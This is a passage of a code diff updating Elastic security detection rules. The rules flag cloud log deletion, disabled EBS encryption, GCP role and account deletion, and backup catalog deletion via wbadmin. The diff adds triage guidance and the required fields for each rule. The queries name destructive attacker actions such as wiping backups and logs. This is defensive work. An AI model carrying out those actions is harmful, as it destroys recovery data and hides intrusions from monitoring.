collects monitoring and operational data in the form of\nlogs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize\nlogs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your\napplications running smoothly.\n\nA log group is a group of log streams that share the same retention, monitoring, and access control settings. You can\ndefine log groups and specify which streams to put into each group. There is no limit on the number of log streams that\ncan belong to one log group.\n\nThis rule looks for the deletion of a log group using the API `DeleteLogGroup` action. Attackers can do this to cover\ntheir tracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log group's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:logs.amazonaws.com and event.action:DeleteLogGroup and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-group.html", "https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "68a7a5a5-a2fc-4a76-ba9f-26849de881b4", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -73,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json index 930dc822eea03..872cd1d3c50c1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudWatch Log Stream Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Log Stream Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of\nlogs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize\nlogs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your\napplications running smoothly.\n\nA log stream is a sequence of log events that share the same source. Each separate source of logs in CloudWatch Logs\nmakes up a separate log stream.\n\nThis rule looks for the deletion of a log stream using the API `DeleteLogStream` action. Attackers can do this to cover\ntheir tracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log stream's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:logs.amazonaws.com and event.action:DeleteLogStream and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-stream.html", "https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogStream.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -30,7 +60,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Log Auditing" + "Log Auditing", + "Impact" ], "threat": [ { @@ -73,5 +104,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json index 1dc41bd4bab5f..43f50f4a97ce1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Deleting Backup Catalogs with Wbadmin", - "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are\nlocated) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files.\nDeleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are\nlocated) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files.\nDeleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"wbadmin.exe\" or process.pe.original_file_name == \"WBADMIN.EXE\") and\n process.args : \"catalog\" and process.args : \"delete\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json index 04f1adaee3edb..6c9c7adbb79db 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json @@ -15,15 +15,45 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Encryption Disabled", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DisableEbsEncryptionByDefault and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html", "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/disable-ebs-encryption-by-default.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bb9b13b2-1700-48a8-a750-b43b0a72ab69", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -59,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json index 9a20a97b632fa..88a6d9119fa9e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EFS File System or Mount Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:elasticfilesystem.amazonaws.com and \nevent.action:(DeleteMountTarget or DeleteFileSystem) and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:elasticfilesystem.amazonaws.com and\nevent.action:(DeleteMountTarget or DeleteFileSystem) and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "536997f7-ae73-447d-a12d-bff1e8f5f0a0", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json index f67419f5746ce..5b382eff18c96 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP IAM Role Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DeleteRole and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteRole and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/understanding-roles" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e2fb5b18-e33c-4270-851e-c3d675c9afcd", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json index e928a60c132f6..11427385c661f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Service Account Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DeleteServiceAccount and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccount and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/service-accounts" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8fb75dda-c47a-4e34-8ecd-34facf7aad13", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json index 6c205987eaf17..47ea948098ef8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Service Account Disabled", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DisableServiceAccount and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DisableServiceAccount and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/service-accounts" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bca7d28e-4a48-47b1-adb7-5074310e9a61", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json index 9d28009acb13b..3b750314cf3e7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json @@ -13,13 +13,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Storage Bucket Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:\"storage.buckets.delete\"\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:\"storage.buckets.delete\"\n", "references": [ "https://cloud.google.com/storage/docs/key-terms#buckets" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bc0f2d83-32b8-4ae2-b0e6-6a45772e9331", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_network_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_network_deleted.json deleted file mode 100644 index 2748a1f573e9f..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_network_deleted.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies when a Virtual Private Cloud (VPC) network is deleted in Google Cloud Platform (GCP). A VPC network is a virtual version of a physical network within a GCP project. Each VPC network has its own subnets, routes, and firewall, as well as other elements. An adversary may delete a VPC network in order to disrupt their target's network and business operations.", - "false_positives": [ - "Virtual Private Cloud networks may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "index": [ - "filebeat-*", - "logs-gcp*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "GCP Virtual Private Cloud Network Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.networks.delete and event.outcome:success\n", - "references": [ - "https://cloud.google.com/vpc/docs/vpc" - ], - "risk_score": 47, - "rule_id": "c58c3081-2e1d-4497-8491-e73a45d1a6d6", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "GCP", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 5 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_created.json deleted file mode 100644 index 143d7138d8bad..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_created.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies when a virtual private cloud (VPC) route is created in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may create a route in order to impact the flow of network traffic in their target's cloud environment.", - "false_positives": [ - "Virtual Private Cloud routes may be created by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "index": [ - "filebeat-*", - "logs-gcp*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "GCP Virtual Private Cloud Route Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:(v*.compute.routes.insert or \"beta.compute.routes.insert\")\n", - "references": [ - "https://cloud.google.com/vpc/docs/routes", - "https://cloud.google.com/vpc/docs/using-routes" - ], - "risk_score": 21, - "rule_id": "9180ffdf-f3d0-4db3-bf66-7a14bcff71b8", - "severity": "low", - "tags": [ - "Elastic", - "Cloud", - "GCP", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_deleted.json deleted file mode 100644 index 0d4f5591c9688..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_deleted.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies when a Virtual Private Cloud (VPC) route is deleted in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may delete a route in order to impact the flow of network traffic in their target's cloud environment.", - "false_positives": [ - "Virtual Private Cloud routes may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "index": [ - "filebeat-*", - "logs-gcp*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "GCP Virtual Private Cloud Route Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.routes.delete and event.outcome:success\n", - "references": [ - "https://cloud.google.com/vpc/docs/routes", - "https://cloud.google.com/vpc/docs/using-routes" - ], - "risk_score": 47, - "rule_id": "a17bcc91-297b-459b-b5ce-bc7460d8f82a", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "GCP", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 5 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_admin_role_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_admin_role_deletion.json new file mode 100644 index 0000000000000..435a9ca203d24 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_admin_role_deletion.json @@ -0,0 +1,84 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when a custom admin role is deleted. An adversary may delete a custom admin role in order to impact the permissions or capabilities of system administrators.", + "false_positives": [ + "Google Workspace admin roles may be deleted by system administrators. Verify that the 